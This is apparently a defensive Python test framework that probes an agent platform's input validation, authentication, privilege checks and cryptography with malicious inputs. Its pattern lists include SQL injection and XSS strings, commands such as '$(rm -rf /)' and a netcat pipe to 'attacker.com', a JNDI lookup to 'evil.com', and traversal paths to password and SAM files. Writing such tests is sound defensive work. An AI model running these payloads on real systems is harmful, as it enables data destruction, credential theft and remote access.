"""
Security Testing Framework for Agent Orchestration Platform.
This module provides comprehensive security testing capabilities including:
- Input validation testing with malicious patterns
- Authentication and authorization bypass attempts
- Privilege escalation testing
- Resource exhaustion and DoS resistance
- Cryptographic security validation
- Audit trail integrity verification
- Inter-agent isolation testing
Integrates with ADDER+ security contracts and defensive programming principles.
Author: Adder_1 | Created: 2025-06-26 | Testing Infrastructure Task
"""
import pytest
import asyncio
import time
import hashlib
import secrets
from typing import Any, List, Dict, Callable, Optional, Union
from unittest.mock import AsyncMock, MagicMock
from hypothesis import given, strategies as st, assume, settings, HealthCheck
from dataclasses import dataclass
import logging
# Import our testing strategies
from tests.strategies.hypothesis_strategies import (
malicious_input_strategy, sql_injection_strategy, xss_injection_strategy,
command_injection_strategy, malicious_path_strategy, agent_name_strategy,
invalid_agent_name_strategy, security_test_scenario_strategy
)
# ============================================================================
# Security Test Configuration and Exceptions
# ============================================================================
@dataclass
class SecurityTestConfig:
    """Configuration for security testing parameters.

    Passed to SecurityTestFramework; a default-constructed instance is used
    when the caller supplies none.
    """
    # Hard ceiling (seconds) applied to awaited calls in _safe_call and to
    # asyncio.wait_for in the resource-exhaustion tests.
    max_test_time_seconds: int = 30
    # Property-based tests skip (assume away) inputs longer than this.
    max_input_length: int = 10000
    # Number of fuzzing iterations -- not read by the visible framework code;
    # TODO confirm whether external runners consume this.
    fuzz_iterations: int = 100
    # Gate for tests with destructive side effects -- not read by the visible
    # framework code; presumably checked by the test runner. Verify.
    enable_destructive_tests: bool = False
    # When True, detected input-validation bypasses are logged at WARNING.
    log_failed_attempts: bool = True
    # Strict-mode flag -- not read by the visible framework code; TODO confirm.
    strict_validation: bool = True
class SecurityTestFailure(Exception):
    """Signals that a security test detected a vulnerability."""
class SecurityBoundaryViolation(Exception):
    """Signals that a security boundary was violated."""
class AuthenticationBypassAttempt(Exception):
    """Signals an attempted authentication bypass."""
class PrivilegeEscalationAttempt(Exception):
    """Signals an attempted privilege escalation."""
# ============================================================================
# Core Security Testing Framework
# ============================================================================
class SecurityTestFramework:
    """
    Comprehensive security testing framework with property-based testing.

    Provides methods for testing all major security boundaries and attack vectors
    while integrating with ADDER+ defensive programming principles. Each
    ``test_*`` coroutine probes one attack class (input validation,
    authentication bypass, privilege escalation, resource exhaustion,
    cryptography) and returns a result dict listing detected vulnerabilities
    plus an overall ``"PASS"``/``"FAIL"`` status.
    """

    def __init__(self, config: Optional[SecurityTestConfig] = None):
        """Initialize the framework.

        Args:
            config: Optional configuration; a default SecurityTestConfig is
                constructed when omitted.
        """
        self.config = config or SecurityTestConfig()
        self.logger = logging.getLogger(__name__)
        # NOTE(review): never appended to inside this module -- presumably a
        # collection point for external callers; confirm before removing.
        self.test_results = []

    async def test_input_validation_security(
        self,
        validator_function: Callable[[str], bool],
        input_type: str = "generic"
    ) -> Dict[str, Any]:
        """
        Test input validation against malicious input patterns.

        Args:
            validator_function: Function to test for input validation. May be
                sync or async; returning True means the input was accepted.
            input_type: Type of input being tested (for logging)

        Returns:
            Dictionary with test results and detected vulnerabilities
        """
        vulnerabilities = []
        test_count = 0
        # NOTE: the "\\x.." and "\\r\\n" entries below are the *literal escape
        # text* (backslash plus characters), not raw control bytes;
        # _classify_attack_vector matches them on the same literal basis.
        malicious_patterns = [
            # SQL Injection patterns
            "'; DROP TABLE agents; --",
            "' OR '1'='1",
            "'; DELETE FROM sessions; --",
            "admin'--",
            # XSS patterns
            "<script>alert('xss')</script>",
            "<img src=x onerror=alert('xss')>",
            "javascript:alert('xss')",
            "<svg onload=alert('xss')>",
            # Command injection patterns
            "$(rm -rf /)",
            "; cat /etc/passwd",
            "| nc attacker.com 4444",
            "`whoami`",
            # Path traversal patterns
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "/dev/null",
            "/proc/self/environ",
            # Template injection patterns
            "{{7*7}}",
            "${jndi:ldap://evil.com/a}",
            "#{7*7}",
            # Binary and encoding attacks (literal escape text, see NOTE above)
            "\\x00\\x00\\x00\\x00",
            "\\xff\\xfe\\xfd",
            "%00%00%00%00",
            # Overflow attempts
            "A" * 1000,
            "A" * 10000,
            # Special characters and encodings
            "\\r\\n\\r\\nHTTP/1.1 200 OK\\r\\n",
            "file:///etc/passwd",
            "data:text/html,<script>alert('xss')</script>",
        ]
        for malicious_input in malicious_patterns:
            test_count += 1
            try:
                # Test the validator with malicious input
                is_valid = await self._safe_call(validator_function, malicious_input)
                if is_valid:
                    # Malicious input was accepted - potential vulnerability
                    vulnerability = {
                        "type": "input_validation_bypass",
                        "input": malicious_input[:100],  # Limit logging for safety
                        "attack_vector": self._classify_attack_vector(malicious_input),
                        "severity": "HIGH",
                        "description": f"Malicious {input_type} input was accepted by validator"
                    }
                    vulnerabilities.append(vulnerability)
                    if self.config.log_failed_attempts:
                        self.logger.warning(f"Security vulnerability detected: {vulnerability}")
            except (ValueError, TypeError, SecurityBoundaryViolation) as e:
                # Expected security exceptions - good!
                pass
            except Exception as e:
                # Unexpected exceptions might indicate vulnerabilities
                vulnerability = {
                    "type": "unexpected_exception",
                    "input": malicious_input[:100],
                    "exception": str(e),
                    "severity": "MEDIUM",
                    "description": f"Unexpected exception during validation: {type(e).__name__}"
                }
                vulnerabilities.append(vulnerability)
        return {
            "input_type": input_type,
            "tests_run": test_count,
            "vulnerabilities_found": len(vulnerabilities),
            "vulnerabilities": vulnerabilities,
            "status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
        }

    @given(malicious_input=malicious_input_strategy())
    @settings(max_examples=50, deadline=30000, suppress_health_check=[HealthCheck.too_slow])
    async def test_boundary_enforcement_property(
        self,
        boundary_function: Callable[[Any], bool],
        malicious_input: str
    ):
        """
        Property-based test for security boundary enforcement.

        Property: No malicious input should bypass security boundaries.

        NOTE(review): @given wraps an async method here; plain Hypothesis does
        not await coroutine tests without an async-aware runner (e.g.
        pytest-asyncio integration). Confirm how this is executed.
        """
        # Skip over-long inputs rather than failing on them.
        assume(len(malicious_input) <= self.config.max_input_length)
        try:
            # Test the boundary function
            result = await self._safe_call(boundary_function, malicious_input)
            # Malicious inputs should be rejected
            if result is True:
                raise SecurityTestFailure(
                    f"Security boundary bypassed by malicious input: {malicious_input[:50]}..."
                )
        except (SecurityBoundaryViolation, ValueError, TypeError):
            # Expected security exceptions are good
            pass
        except SecurityTestFailure:
            # Re-raise our security test failures
            raise
        except Exception as e:
            # Log unexpected exceptions for investigation
            self.logger.error(f"Unexpected exception in boundary test: {type(e).__name__}: {e}")
            raise SecurityTestFailure(f"Unexpected exception: {type(e).__name__}")

    async def test_authentication_bypass_resistance(
        self,
        auth_function: Callable[[str, str], bool],
        username: str = "testuser"
    ) -> Dict[str, Any]:
        """
        Test resistance to authentication bypass attempts.

        Args:
            auth_function: Authentication function to test; returning a truthy
                value is treated as a successful login.
            username: Valid username for testing

        Returns:
            Dictionary with test results
        """
        # NOTE: the "\\x00" / "\\r\\n" credentials are literal escape text,
        # not actual control characters -- TODO confirm this matches the
        # intended null-byte/CRLF attack simulation.
        bypass_attempts = [
            # SQL injection bypass attempts
            ("admin'--", "password"),
            ("admin' OR '1'='1", "password"),
            ("admin'; --", "anything"),
            # Password bypass attempts
            (username, "' OR '1'='1"),
            (username, "admin'--"),
            (username, "password' OR '1'='1' --"),
            # Empty/null authentication
            ("", ""),
            (None, None),
            ("admin", ""),
            ("", "password"),
            # Long input attacks
            ("A" * 1000, "password"),
            (username, "A" * 1000),
            # Special characters
            ("admin\\x00", "password"),
            (username, "password\\x00"),
            ("admin\\r\\n", "password"),
        ]
        vulnerabilities = []
        for test_username, test_password in bypass_attempts:
            try:
                authenticated = await self._safe_call(
                    auth_function, test_username, test_password
                )
                if authenticated:
                    vulnerability = {
                        "type": "authentication_bypass",
                        "username": str(test_username)[:50],
                        "password": "[REDACTED]",
                        "severity": "CRITICAL",
                        "description": "Authentication bypassed with malicious credentials"
                    }
                    vulnerabilities.append(vulnerability)
            except (AuthenticationBypassAttempt, ValueError, TypeError):
                # Expected authentication failures - good!
                pass
            except Exception as e:
                self.logger.error(f"Unexpected auth error: {e}")
        return {
            "test_type": "authentication_bypass",
            "attempts_tested": len(bypass_attempts),
            "vulnerabilities_found": len(vulnerabilities),
            "vulnerabilities": vulnerabilities,
            "status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
        }

    async def test_privilege_escalation_resistance(
        self,
        privileged_operation: Callable[..., Any],
        unprivileged_context: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Test resistance to privilege escalation attempts.

        Args:
            privileged_operation: Function that requires elevated privileges;
                called with the (tampered) context expanded as keyword args.
            unprivileged_context: Context without required privileges

        Returns:
            Dictionary with test results
        """
        # Each attempt layers one escalation vector on top of the base context.
        escalation_attempts = [
            # Parameter injection attempts
            {**unprivileged_context, "admin": True},
            {**unprivileged_context, "sudo": True},
            {**unprivileged_context, "root": True},
            {**unprivileged_context, "privilege_level": "admin"},
            {**unprivileged_context, "is_admin": True},
            # Token manipulation attempts
            {**unprivileged_context, "auth_token": "admin_token"},
            {**unprivileged_context, "session_id": "admin_session"},
            {**unprivileged_context, "user_id": "0"},  # Root user ID
            # Role manipulation attempts
            {**unprivileged_context, "role": "administrator"},
            {**unprivileged_context, "permissions": ["*"]},
            {**unprivileged_context, "groups": ["admin", "sudo"]},
        ]
        vulnerabilities = []
        for escalation_attempt in escalation_attempts:
            try:
                result = await self._safe_call(
                    privileged_operation, **escalation_attempt
                )
                # If operation succeeded, check if result indicates privilege escalation
                if self._indicates_privilege_escalation(result):
                    vulnerability = {
                        "type": "privilege_escalation",
                        "attempt": str(escalation_attempt)[:200],
                        "result": str(result)[:200],
                        "severity": "CRITICAL",
                        "description": "Privilege escalation successful"
                    }
                    vulnerabilities.append(vulnerability)
            except (PrivilegeEscalationAttempt, PermissionError, ValueError):
                # Expected privilege errors - good!
                pass
            except Exception as e:
                self.logger.error(f"Unexpected privilege escalation error: {e}")
        return {
            "test_type": "privilege_escalation",
            "attempts_tested": len(escalation_attempts),
            "vulnerabilities_found": len(vulnerabilities),
            "vulnerabilities": vulnerabilities,
            "status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
        }

    async def test_resource_exhaustion_resistance(
        self,
        resource_operation: Callable[..., Any],
        resource_params: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Test resistance to resource exhaustion attacks.

        Args:
            resource_operation: Function that consumes resources; called with
                each exhaustion scenario expanded as keyword args.
            resource_params: Parameters for the operation

        Returns:
            Dictionary with test results
        """
        vulnerabilities = []
        # Test various resource exhaustion scenarios
        exhaustion_tests = [
            # Memory exhaustion
            {**resource_params, "size": 1024 * 1024 * 100},  # 100MB
            {**resource_params, "count": 10000},  # Large count
            {**resource_params, "iterations": 100000},  # Many iterations
            # Time-based attacks
            {**resource_params, "timeout": 3600},  # 1 hour timeout
            {**resource_params, "delay": 1000},  # Very long delay
            # Recursive attacks
            {**resource_params, "depth": 10000},  # Deep recursion
            {**resource_params, "nested_levels": 1000},  # Deep nesting
        ]
        for test_params in exhaustion_tests:
            start_time = time.time()
            try:
                # Set a reasonable timeout for the test
                result = await asyncio.wait_for(
                    self._safe_call(resource_operation, **test_params),
                    timeout=self.config.max_test_time_seconds
                )
                elapsed = time.time() - start_time
                # Check if operation took too long or used excessive resources
                if elapsed > 10.0:  # More than 10 seconds
                    vulnerability = {
                        "type": "resource_exhaustion",
                        "test_params": str(test_params)[:200],
                        "elapsed_time": elapsed,
                        "severity": "HIGH",
                        "description": f"Operation took {elapsed:.2f} seconds"
                    }
                    vulnerabilities.append(vulnerability)
                # Check for memory usage if available
                if hasattr(result, 'memory_usage') and result.memory_usage > 100 * 1024 * 1024:  # 100MB
                    vulnerability = {
                        "type": "memory_exhaustion",
                        "memory_used": result.memory_usage,
                        "severity": "HIGH",
                        "description": f"Excessive memory usage: {result.memory_usage} bytes"
                    }
                    vulnerabilities.append(vulnerability)
            except asyncio.TimeoutError:
                # Timeout is expected for resource exhaustion attempts
                pass
            except (MemoryError, OSError):
                # Expected resource limit exceptions
                pass
            except Exception as e:
                self.logger.error(f"Unexpected resource exhaustion error: {e}")
        return {
            "test_type": "resource_exhaustion",
            "tests_run": len(exhaustion_tests),
            "vulnerabilities_found": len(vulnerabilities),
            "vulnerabilities": vulnerabilities,
            "status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
        }

    async def test_cryptographic_security(
        self,
        encryption_function: Callable[[bytes, bytes], bytes],
        decryption_function: Callable[[bytes, bytes], bytes],
        key_generation_function: Callable[[], bytes]
    ) -> Dict[str, Any]:
        """
        Test cryptographic security implementation.

        Args:
            encryption_function: Function to encrypt data (data, key) -> ciphertext
            decryption_function: Function to decrypt data (ciphertext, key) -> data
            key_generation_function: Function to generate keys

        Returns:
            Dictionary with test results
        """
        vulnerabilities = []
        # Test weak key generation
        keys = []
        for _ in range(10):
            key = key_generation_function()
            if key in keys:
                vulnerability = {
                    "type": "weak_key_generation",
                    "severity": "CRITICAL",
                    "description": "Key generation produced duplicate keys"
                }
                vulnerabilities.append(vulnerability)
            keys.append(key)
        # Test key strength
        for key in keys[:3]:  # Test first 3 keys
            if len(key) < 32:  # Less than 256 bits
                vulnerability = {
                    "type": "insufficient_key_length",
                    "key_length": len(key),
                    "severity": "HIGH",
                    "description": f"Key length {len(key)} bytes is insufficient"
                }
                vulnerabilities.append(vulnerability)
        # Test encryption/decryption with malicious data.
        # Fixed: the previous fallback literal was actually 31 bytes despite
        # its name; this one is exactly 32 bytes (256 bits).
        test_key = keys[0] if keys else b"test_key_32_bytes_long_for_test!"
        # Fixed: b"\\x00"/b"\\xff" were literal backslash text; the comments
        # ("Null bytes", "All 1s") show real control bytes were intended.
        malicious_data = [
            b"\x00" * 1000,  # Null bytes
            b"\xff" * 1000,  # All 1s
            secrets.token_bytes(1024 * 1024),  # Random 1MB data
            b"A" * 100000,  # Large repeated pattern
        ]
        for data in malicious_data:
            try:
                encrypted = encryption_function(data, test_key)
                decrypted = decryption_function(encrypted, test_key)
                # Round-trip must reproduce the plaintext exactly.
                if decrypted != data:
                    vulnerability = {
                        "type": "encryption_integrity_failure",
                        "data_size": len(data),
                        "severity": "CRITICAL",
                        "description": "Decrypted data doesn't match original"
                    }
                    vulnerabilities.append(vulnerability)
            except Exception as e:
                self.logger.error(f"Cryptographic test error: {e}")
        return {
            "test_type": "cryptographic_security",
            "keys_tested": len(keys),
            "data_patterns_tested": len(malicious_data),
            "vulnerabilities_found": len(vulnerabilities),
            "vulnerabilities": vulnerabilities,
            "status": "PASS" if len(vulnerabilities) == 0 else "FAIL"
        }

    # ========================================================================
    # Property-Based Security Tests
    # ========================================================================
    @given(
        attack_scenario=security_test_scenario_strategy(),
        target_input=malicious_input_strategy()
    )
    @settings(max_examples=20, deadline=60000)
    async def test_comprehensive_security_property(
        self,
        system_under_test: Callable[[str, Dict[str, Any]], Any],
        attack_scenario: Dict[str, Any],
        target_input: str
    ):
        """
        Comprehensive property-based security test.

        Property: System should resist all attack vectors regardless of input.

        NOTE(review): same async/@given execution caveat as
        test_boundary_enforcement_property.
        """
        assume(len(target_input) <= self.config.max_input_length)
        try:
            result = await self._safe_call(
                system_under_test, target_input, attack_scenario
            )
            # Analyze result for security violations
            if self._contains_security_violation(result, target_input, attack_scenario):
                raise SecurityTestFailure(
                    f"Security violation detected with scenario: {attack_scenario['attack_vectors']}"
                )
        except (SecurityBoundaryViolation, ValueError, TypeError):
            # Expected security exceptions
            pass
        except SecurityTestFailure:
            raise
        except Exception as e:
            self.logger.error(f"Unexpected security test error: {e}")
            raise SecurityTestFailure(f"Unexpected exception: {type(e).__name__}")

    # ========================================================================
    # Helper Methods
    # ========================================================================
    async def _safe_call(self, func: Callable, *args, **kwargs) -> Any:
        """Safely call a function with timeout protection.

        Coroutine functions are awaited under the configured timeout;
        synchronous callables are invoked inline (no timeout can be
        enforced on them).

        Raises:
            SecurityTestFailure: If the awaited call exceeds the timeout.
        """
        try:
            if asyncio.iscoroutinefunction(func):
                return await asyncio.wait_for(
                    func(*args, **kwargs),
                    timeout=self.config.max_test_time_seconds
                )
            else:
                return func(*args, **kwargs)
        except asyncio.TimeoutError:
            raise SecurityTestFailure("Function call timed out")

    def _classify_attack_vector(self, malicious_input: str) -> str:
        """Classify the type of attack vector based on input pattern.

        Checks are ordered; the first matching category wins.
        """
        if "DROP TABLE" in malicious_input.upper() or "' OR '" in malicious_input:
            return "sql_injection"
        elif "<script>" in malicious_input.lower() or "javascript:" in malicious_input.lower():
            return "xss"
        elif "$(" in malicious_input or "`" in malicious_input:
            return "command_injection"
        # Fixed: the original Windows-traversal literal was unterminated
        # (trailing escaped quote -> SyntaxError); ".." + backslash intended.
        elif "../" in malicious_input or "..\\" in malicious_input:
            return "path_traversal"
        elif "{{" in malicious_input or "${" in malicious_input:
            return "template_injection"
        elif "\\x00" in malicious_input:
            # Matches the literal text "\x00" used by the pattern lists above.
            return "null_byte_injection"
        else:
            return "unknown"

    def _indicates_privilege_escalation(self, result: Any) -> bool:
        """Check if result indicates successful privilege escalation.

        Dict results are scanned for truthy privilege keys; string results
        for known escalation phrases. Anything else is treated as safe.
        """
        if isinstance(result, dict):
            dangerous_keys = ["admin", "root", "sudo", "elevated", "privileged"]
            return any(key in result and result[key] for key in dangerous_keys)
        elif isinstance(result, str):
            dangerous_phrases = ["admin access", "root access", "privilege granted"]
            return any(phrase in result.lower() for phrase in dangerous_phrases)
        return False

    def _contains_security_violation(
        self,
        result: Any,
        input_data: str,
        scenario: Dict[str, Any]
    ) -> bool:
        """Check if result contains security violations.

        Flags: malicious input echoed back verbatim (potential XSS),
        privilege-escalation indicators, and sensitive keys exposed in dict
        results. ``scenario`` is currently unused by the visible checks.
        """
        if result is None:
            return False
        # Check for echoed malicious input (potential XSS)
        if isinstance(result, str) and input_data in result:
            return True
        # Check for privilege escalation indicators
        if self._indicates_privilege_escalation(result):
            return True
        # Check for data exposure
        if isinstance(result, dict):
            sensitive_keys = ["password", "token", "secret", "key", "credential"]
            if any(key in result for key in sensitive_keys):
                return True
        return False
# ============================================================================
# Security Test Decorators and Utilities
# ============================================================================
def security_test(
    attack_vectors: Optional[List[str]] = None,
    max_examples: int = 50,
    timeout_seconds: int = 30
):
    """
    Decorator for marking security tests with specific attack vectors.

    Args:
        attack_vectors: List of attack vectors to test (None becomes an
            empty list; the annotation now reflects that None is allowed)
        max_examples: Maximum examples for property-based tests
        timeout_seconds: Timeout for individual tests

    Returns:
        A decorator that tags the test function with ``_security_test``,
        ``_attack_vectors``, ``_max_examples`` and ``_timeout_seconds``
        attributes for discovery by a test runner.
    """
    def decorator(test_func):
        test_func._security_test = True
        # None defaults to a fresh empty list per decorated function.
        test_func._attack_vectors = attack_vectors or []
        test_func._max_examples = max_examples
        test_func._timeout_seconds = timeout_seconds
        return test_func
    return decorator
def requires_security_config(config_key: str, default_value: Any = None):
    """Decorator to require specific security configuration.

    Tags the test function with the required configuration key and its
    fallback value so a runner can validate configuration before execution.
    """
    def decorator(test_func):
        setattr(test_func, "_requires_config", config_key)
        setattr(test_func, "_config_default", default_value)
        return test_func
    return decorator
class SecurityTestSuite:
    """Collection of ready-to-use security tests for common components.

    Every suite entry constructs a fresh SecurityTestFramework and delegates
    to the matching framework method, keeping the suite stateless.
    """

    @staticmethod
    @security_test(attack_vectors=["input_validation"])
    async def test_agent_name_validation_security(validator_func):
        """Test agent name validation against malicious inputs."""
        fw = SecurityTestFramework()
        return await fw.test_input_validation_security(validator_func, "agent_name")

    @staticmethod
    @security_test(attack_vectors=["authentication_bypass"])
    async def test_authentication_security(auth_func):
        """Test authentication mechanism security."""
        fw = SecurityTestFramework()
        return await fw.test_authentication_bypass_resistance(auth_func)

    @staticmethod
    @security_test(attack_vectors=["privilege_escalation"])
    async def test_authorization_security(privileged_func, context):
        """Test authorization mechanism security."""
        fw = SecurityTestFramework()
        return await fw.test_privilege_escalation_resistance(privileged_func, context)
# Export main components
__all__ = [
'SecurityTestFramework', 'SecurityTestConfig', 'SecurityTestFailure',
'SecurityBoundaryViolation', 'SecurityTestSuite', 'security_test',
'requires_security_config'
]